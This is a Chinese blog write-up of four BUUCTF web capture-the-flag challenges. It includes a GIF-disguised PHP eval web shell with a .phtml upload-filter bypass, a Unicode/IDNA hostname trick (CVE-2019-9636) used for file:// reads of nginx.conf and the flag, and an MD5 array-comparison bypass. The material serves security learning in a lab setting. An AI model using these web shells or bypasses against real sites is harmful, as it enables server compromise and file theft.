Web-8(29-32)-BUUCTF平台

最新推荐文章于 2021-08-28 23:41:00 发布
最新推荐文章于 2021-08-28 23:41:00 发布
阅读量3.7k 收藏 2
点赞数 2
分类专栏: CTF BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hiahiachang/article/details/105443688
版权
CTF 同时被 2 个专栏收录
28 篇文章 7 订阅
订阅专栏
BUUCTF
19 篇文章 1 订阅
订阅专栏

本篇内容
[极客大挑战 2019]Upload
[ACTF2020 新生赛]Exec
[SUCTF 2019]Pythonginx
[BJDCTF2020]Easy MD5

上一篇 | 目录 | 下一篇

[极客大挑战 2019]Upload
在这里插入图片描述
很像之前写的一道题目:[SUCTF 2019]CheckIn。按照这个方法上传.user.ini发现不行。而且写一句话时同样的不能带有<?,需要内容换成这样<script language='php'>eval($_GET['a']);</script>样子才能上传。
既然.user.ini不能上传到话,那就尝试一下php的一些绕过文件名后缀的检查的方法:

php、php2、php3、php5、phtml

发现phtml可以绕过,a.phtml内容:

GIF89a
<script language='php'>eval($_POST['a']);</script>

操作如下:
在这里插入图片描述
然后就是蚁剑连接了:
在这里插入图片描述
然后在根路径下找到flag:
在这里插入图片描述
当然的,不用一句话连接蚁剑连接也是可以啊,但操作方式一样,a.phtml内容如下:

GIF89a
<script language='php'>eval($_GET['a']);</script>

操作方式:
在这里插入图片描述
然后就是执行命令了:
在这里插入图片描述
在这里插入图片描述




[ACTF2020 新生赛]Exec
在这里插入图片描述
老套路了,直接做:
在这里插入图片描述
在这里插入图片描述
拿到flag。




[SUCTF 2019]Pythonginx

直接右键查看源码可以查看到正确格式的内容:

@app.route('/getUrl', methods=['GET', 'POST'])
def getUrl():
    url = request.args.get("url")
    host = parse.urlparse(url).hostname
    if host == 'suctf.cc':
        return "我扌 your problem? 111"
    parts = list(urlsplit(url))
    host = parts[1]
    if host == 'suctf.cc':
        return "我扌 your problem? 222 " + host
    newhost = []
    for h in host.split('.'):
        newhost.append(h.encode('idna').decode('utf-8'))
    parts[1] = '.'.join(newhost)
    #去掉 url 中的空格
    finalUrl = urlunsplit(parts).split(' ')[0]
    host = parse.urlparse(finalUrl).hostname
    if host == 'suctf.cc':
        return urllib.request.urlopen(finalUrl).read()
    else:
        return "我扌 your problem? 333"
        
    <!-- Dont worry about the suctf.cc. Go on! -->
    <!-- Do you know the nginx? -->

代码感觉有些难度,那就用一个例子解释一下一些函数的作用:

>>> from urllib import parse
>>> url = 'http://www.example.com/a?b&c=1#2'
>>> host = parse.urlparse(url).hostname	#urlparse对url进行分割,host等于其中的hostname
>>> parse.urlparse(url)					#查看一下效果
ParseResult(scheme='http', netloc='www.example.com', path='/a', params='', query='b&c=1', fragment='2')
>>> host								#查看host的内容
'www.example.com'
>>> parts = list(parse.urlsplit(url))	#同样的,urlsplit也是分割url,并保存为列表
>>> parts								#查看一下效果
['http', 'www.example.com', '/a', 'b&c=1', '2']
>>> host = parts[1]						#相当于也是取其中的hostname
>>> host
'www.example.com'
>>> finalUrl = parse.urlunsplit(parts).split(' ')[0]	#urlunsplit拼接为url
>>> finalUrl											#查看一下效果
'http://www.example.com/a?b&c=1#2'
>>>

是不是这些函数方法也不是很难。那再来看看代码的意思:
我们最终是要让他return的是urllib.request.urlopen(finalUrl).read(),其他的return都不行
在这里插入图片描述
也就是说总共三个if语句,我们只能满足第三个if语句,即host在一开始并不能等于suctf.cc,到了第三个if语句它就要等于suctf.cc了。那感觉有些难度啊,肯定存在漏洞让我们来绕过,我之前解释函数有一块没有解释:
在这里插入图片描述
这里的解释参考大佬文章:python中urlsplit函数存在的漏洞

CVE-2019-9636:urlsplit 不处理 NFKC 标准化
CVE-2019-10160:urlsplit NFKD 标准化漏洞

漏洞原理:
用 Punycode/IDNA 编码的 URL 使用 NFKC 规范化来分解字符。可能导致某些字符将新的段引入 URL。
例如,在直接比较中,\ uFF03不等于'#',而是统一化为'#',这会更改 URL 的片段部分。类似地,\ u2100 统一化为'a/c',它引入了路径段。

那我们只需要寻找到可替代字符就好了,到这里还是不太懂这个漏洞,没事,我再用一个例子讲一下:

>>> host = 'suctf.cⅭ'		#注意这里的Ⅽ并不是大写的C,而是一个Unicode码
>>> (host == 'suctf.cc')	#直接比较却不相等
False
>>> (host.encode('idna').decode('utf-8') == 'suctf.cc')	#但是经过idna编码后用utf-8解码后就相等了
True
>>>

这只是一个替代的例子,那到底有哪些可替代字符呢,参考altman学长写的一个脚本:

# coding:utf-8 
for i in range(128,65537):    
    tmp=chr(i)    
    try:        
        res = tmp.encode('idna').decode('utf-8')        
        if("-") in res:            
            continue        
        print("U:{}    A:{}      ascii:{} ".format(tmp, res, i))    
    except:        
        pass

这里的脚本我是抄来的,但我写文章只要是抄来的都会写来源的,可惜这次因为我抄的脚本的那个人也是抄来的,他没写来源,我不能写他的啊,他又不是原作者,所以没法指向真正的来源文章。
好了,我感觉介绍的差不多了,该是构造payload了。
一开始的源代码提示了nginx,而nginx的配置文件目录为:/usr/local/nginx/conf/nginx.conf,而且host为suctf.cc
然后我尝试发现了不能用http和https协议,得用file本地文件传输协议,所以希望传入的是

file://suctf.cc/usr/local/nginx/conf/nginx.conf

替代方法有多种,虽然我看网上的WP都使用的是来替代c/u,那我就使用个简单的代替c就好。所以payload:

file://suctf.cⅭ/usr/local/nginx/conf/nginx.conf

在这里插入图片描述
在这里插入图片描述
提示在/usr/fffffflag下,payload:

file://suctf.cⅭ/usr/fffffflag

在这里插入图片描述
在这里插入图片描述
拿到最终flag。这次难得的写了一次详细的WP,是因为我觉得这个漏洞比较有意思,而且觉得百度第一页搜出来的WP写的不够详细,对我这样真正的菜鸡不够友好。




[BJDCTF2020]Easy MD5
在这里插入图片描述
尝试注入后没结果,抓个包看看:
在这里插入图片描述
提示select * from 'admin' where password=md5($pass,true),看到这语句就知道要使用ffifdyop了,我不做解释了,网上一大堆。
在这里插入图片描述
提交后另一个界面直接右键源代码,出现:

<!--
$a = $GET['a'];
$b = $_GET['b'];

if($a != $b && md5($a) == md5($b)){
    // wow, glzjin wants a girl friend.
-->

直接数组绕过,payload:

?a[]=1&b[]=2

在这里插入图片描述
出现如下代码:

<?php
error_reporting(0);
include "flag.php";

highlight_file(__FILE__);

if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
    echo $flag;
}

也可以直接数组绕过,拿到flag。
在这里插入图片描述




========================================================
上一篇-----------------------------------目录 -----------------------------------下一篇
========================================================
转载请注明出处
本文网址:https://blog.csdn.net/hiahiachang/article/details/105443688
========================================================

airrudder
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
变量覆盖漏洞 自定义的参数值替换原有变量值的情况称为变量覆盖漏洞 经常导致变量覆盖漏洞场景有:$使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_variables()使用不当,开启了全局...
buu——web
weixin_73668856的博客
11-29 320
新手web
BUU WEB刷题记录1(持续更新)
Sapphire037的博客
05-19 1042
[SUCTF 2019]Pythonginx 1
feng的博客
11-17 1212
知识点 CVE-2019-9636:urlsplit不处理NFKC标准化 nginx重要文件的位置 url中的unicode漏洞引发的域名安全问题(19年black hat中的一个议题) 跑python脚本(逃~。。。。) WP 这题自己其实已经找到了方法,但是还是没敢继续尝试。 首先我们需要知道nginx重要文件的位置: 配置文件存放目录:/etc/nginx 主配置文件:/etc/nginx/conf/nginx.conf 管理脚本:/usr/lib64/systemd/system/nginx.
成功爬取CVE-2019-9766漏洞复现【CSDN】【1】
HWP
03-14 1032
代码: import requests import bs4 from bs4 import BeautifulSoup import re ss = '' headers = { 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0...
[SUCTF 2019]Pythonginx(Idna与utf-8编码漏洞)
paidx0
08-28 2213
每天一题,记录学习 题目直接给了源码 @app.route('/getUrl', methods=['GET', 'POST']) def getUrl(): url = request.args.get("url") host = parse.urlparse(url).hostname if host == 'suctf.cc': return "我扌 your problem? 111" parts = list(urlsplit(ur
spring-web-5.1.5.RELEASE.jar
01-08
spring-web-5.1.5.RELEASE.jar
web-socket-js
12-19
web-socket-js亲测可用
text-generation-webui-main
最新发布
09-20
多种模型后端: transformers、llama.cpp、ExLlama、AutoGPTQ、GPTQ-for-LaMa、ctransformers
go-fastdfs-web:Go-Fastdfs web管理平台
04-12
Go-Fastdfs web管理平台 go-fastdfs 是一个简单的分布式文件存储,具有高性能,高可靠,免维护等优点,支持断点续传,分块上传,小文件合并,自动同步,自动修复。本项目为go-fastdfs的web管理端 简单预览图 注意...
[SUCTF 2019]Pythonginx
m0_53314778的博客
02-06 577
[SUCTF 2019]Pythonginx 知识点:nginx配置文件路径 black hat一个议题 任意读取文件 这道题用的是blackhat议题之一HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization,blackhat这个议题的PPT链接如下: https://i.blackhat.com/USA-19/Thursday/us-19-Birch-HostSplit-Exploitable-Antipatterns-In-Unicode
BUU刷题记录——2
weixin_43610673的博客
06-17 1493
[极客大挑战 2019]Upload 上传检测后缀名,文件内容不能有<? 上传a1.jpg GIF89a? <script language="php">eval($_REQUEST[cmd])</script> Bp抓包修改下文件名 不能有php /upload/a1.phtml?cmd=system(‘cat /flag’); [ACTF2020 新生赛]BackupFile /index.php.bak 下载源码 PHP的弱类型特性,int和string是无法直接比
BUU WEB [强网杯 2019]随便注
star_feather的博客
01-19 206
打开网页,只有一个1,直接提交回显出数据,提交2回显数据,提交其他的就没有回显了。 根据题目“随便注”初步判断它应该是一个SQL注入,尝试一下 1’ ,报错: 说明我们的判断是正确的,接下来就是正常程序: order by报字段数: 1' order by 2 # 到三时报错,说明有两个字段, 联合查询报库名: 1' union select1,2# 得到的回复却是他过滤了一些关键字。 关于preg_match函数可参考菜鸟教程: https://www.runoob.com/php/php-p
BUU-Web_极客大挑战-Http
qq_46635165的博客
09-26 494
打开解题网址,一个动态页面,题目提示是 Http,直接抓包: 发现一个Secret.php, 直接访问: 到这里,需要补充一些http 协议头的一些知识: http协议: X-Forwarded-For,X-Forwarded-Hos,client-ip,host :从某个ip或者主机访问 Accept-Language: 从某个国家访问 referer :从某个 url 访问 User-Agent: 包含用户,浏览器名称信息 首先,题目提示 不是从 https://www.Sycsecre
BUUWEB [HCTF 2018]WarmUp
star_feather的博客
01-16 287
对于我这种新人菜鸡来说,如果拿到web题不知道是哪方面的话,一般就是F12查看源代码,抓包,扫描挨个试试看能找到什么线索。在buu上这道题给了提示,是代码审计,打开网址后是一个滑稽,没有代码,既然是代码审计,网页又没有显示代码也没文件,那一般就是审计源代码,查看页面源代码,可以发现一个明显的提示,source.php一般就是存放源代码的文件了,在原网页上包含该文件,即可看到源代码。 审计是我们需要先了解几个函数的作用: isset(): 判断变量是否声明; is_string(): 判断变量是否是字符串;
buuctfweb刷题wp详解及知识整理----warm up(文件包含加php代码审计)
weixin_45784586的博客
12-31 771
buuwe—warm up的wp wp! 上来一个超级滑稽脸(冥冥中仿佛滑稽看透了险恶的ctf世界的真相)。。 F12或者开发者工具看源码 注释中有提示那就访问一下 源码得到 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page...
BUUCTF web(一)
热门推荐
Lemon's blog
10-16 1万+
前言:最近参加了一场CTF比赛,菜的一批,接下来多练习web题、MISC、密码学,多思考,提高一下自己做题的思路,以及代码审计、编写脚本的能力。 [HCTF 2018]WarmUp 查看源码,发现<!--source.php-->,打开发现源码 <?php highlight_file(__FILE__); if (! empty($_REQUEST['file...
BUU-web HardSQL
qq_46635165的博客
10-18 296
知识点: sql显错注入 显错注入:简单来说,就是通过某些函数回显的报错信息来获取我们想要的数据; 例如: mysql的 updatexml() 函数:由于 select user() 查询出的数据不符合 XPATH 语法,从而报错,顺便将 select user() 这条语句执行,并将结果以报错的方式显示出来; 解题: 打开解题网址,账户密码登录框,尝试单引号报错,报错成功; 单引号闭合,并 # 号注释:闭合成功; 接下来尝试 order by 字段猜测,发现 被过滤:并且过滤了 union ,a.
buuctf web
08-15
回答:根据引用和引用的内容,buuctf web应该是指buuctf比赛中的一个web题目。其中可能涉及到Tornado作为非阻塞式服务器的使用,以及render函数的使用。而根据引用的内容,buuctf web题目可能存在一些漏洞,比如SSRF...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值